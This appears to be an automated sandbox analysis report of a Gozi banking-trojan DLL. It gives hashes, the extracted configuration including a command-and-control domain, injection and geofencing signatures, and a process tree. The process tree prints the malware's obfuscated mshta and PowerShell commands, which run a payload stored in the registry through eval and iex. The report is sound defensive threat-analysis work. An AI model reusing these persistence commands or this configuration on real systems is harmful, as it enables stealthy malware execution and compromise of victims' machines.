Analysis
-
max time kernel
159s -
max time network
167s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2023 13:22
Static task
static1
Behavioral task
behavioral1
Sample
72e2a5c797954e895a41be5b20f867b2.dll
Resource
win7-20230831-en
General
-
Target
72e2a5c797954e895a41be5b20f867b2.dll
-
Size
206KB
-
MD5
72e2a5c797954e895a41be5b20f867b2
-
SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597
-
SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
-
SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
SSDEEP
6144:sMmIE7vr+qWNGzfXDanCU60rPP+vJsWKq12Jy:o/7DrQGzfXDeCU6cevKWXwy
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 62 1524 rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
rundll32.execontrol.exeExplorer.EXEdescription pid process target process PID 1524 set thread context of 3408 1524 rundll32.exe control.exe PID 3408 set thread context of 3096 3408 control.exe Explorer.EXE PID 3096 set thread context of 3676 3096 Explorer.EXE RuntimeBroker.exe PID 3408 set thread context of 4880 3408 control.exe rundll32.exe PID 3096 set thread context of 3968 3096 Explorer.EXE RuntimeBroker.exe PID 3096 set thread context of 4832 3096 Explorer.EXE RuntimeBroker.exe PID 3096 set thread context of 4596 3096 Explorer.EXE RuntimeBroker.exe PID 3096 set thread context of 3720 3096 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exeExplorer.EXEpid process 1524 rundll32.exe 1524 rundll32.exe 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
rundll32.execontrol.exeExplorer.EXEpid process 1524 rundll32.exe 3408 control.exe 3096 Explorer.EXE 3408 control.exe 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE 3096 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
Explorer.EXEpowershell.exedescription pid process Token: SeShutdownPrivilege 3096 Explorer.EXE Token: SeCreatePagefilePrivilege 3096 Explorer.EXE Token: SeShutdownPrivilege 3096 Explorer.EXE Token: SeCreatePagefilePrivilege 3096 Explorer.EXE Token: SeShutdownPrivilege 3096 Explorer.EXE Token: SeCreatePagefilePrivilege 3096 Explorer.EXE Token: SeDebugPrivilege 1368 powershell.exe Token: SeShutdownPrivilege 3096 Explorer.EXE Token: SeCreatePagefilePrivilege 3096 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3096 Explorer.EXE -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
rundll32.exerundll32.execontrol.exeExplorer.EXEmshta.exedescription pid process target process PID 4488 wrote to memory of 1524 4488 rundll32.exe rundll32.exe PID 4488 wrote to memory of 1524 4488 rundll32.exe rundll32.exe PID 4488 wrote to memory of 1524 4488 rundll32.exe rundll32.exe PID 1524 wrote to memory of 3408 1524 rundll32.exe control.exe PID 1524 wrote to memory of 3408 1524 rundll32.exe control.exe PID 1524 wrote to memory of 3408 1524 rundll32.exe control.exe PID 1524 wrote to memory of 3408 1524 rundll32.exe control.exe PID 1524 wrote to memory of 3408 1524 rundll32.exe control.exe PID 3408 wrote to memory of 3096 3408 control.exe Explorer.EXE PID 3408 wrote to memory of 3096 3408 control.exe Explorer.EXE PID 3408 wrote to memory of 3096 3408 control.exe Explorer.EXE PID 3408 wrote to memory of 3096 3408 control.exe Explorer.EXE PID 3096 wrote to memory of 3676 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 3676 3096 Explorer.EXE RuntimeBroker.exe PID 3408 wrote to memory of 4880 3408 control.exe rundll32.exe PID 3408 wrote to memory of 4880 3408 control.exe rundll32.exe PID 3408 wrote to memory of 4880 3408 control.exe rundll32.exe PID 3096 wrote to memory of 3676 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 3676 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 3968 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 3968 3096 Explorer.EXE RuntimeBroker.exe PID 3408 wrote to memory of 4880 3408 control.exe rundll32.exe PID 3408 wrote to memory of 4880 3408 control.exe rundll32.exe PID 3096 wrote to memory of 3968 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 3968 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 4832 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 4832 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 4832 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 4832 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 4596 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 4596 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 4596 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 4596 3096 Explorer.EXE RuntimeBroker.exe PID 3096 wrote to memory of 3720 3096 Explorer.EXE cmd.exe PID 3096 wrote to memory of 3720 3096 Explorer.EXE cmd.exe PID 3096 wrote to memory of 3720 3096 Explorer.EXE cmd.exe PID 3096 wrote to memory of 3720 3096 Explorer.EXE cmd.exe PID 3096 wrote to memory of 3720 3096 Explorer.EXE cmd.exe PID 3096 wrote to memory of 3720 3096 Explorer.EXE cmd.exe PID 4136 wrote to memory of 1368 4136 mshta.exe powershell.exe PID 4136 wrote to memory of 1368 4136 mshta.exe powershell.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\72e2a5c797954e895a41be5b20f867b2.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\72e2a5c797954e895a41be5b20f867b2.dll,#13⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\control.exeC:\Windows\system32\control.exe -h4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h5⤵PID:4880
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>G6ju='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(G6ju).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srtjiayn -value gp; new-alias -name kcmqlqigp -value iex; kcmqlqigp ([System.Text.Encoding]::ASCII.GetString((srtjiayn "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:3720
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4832
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3968
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3676
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4596
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82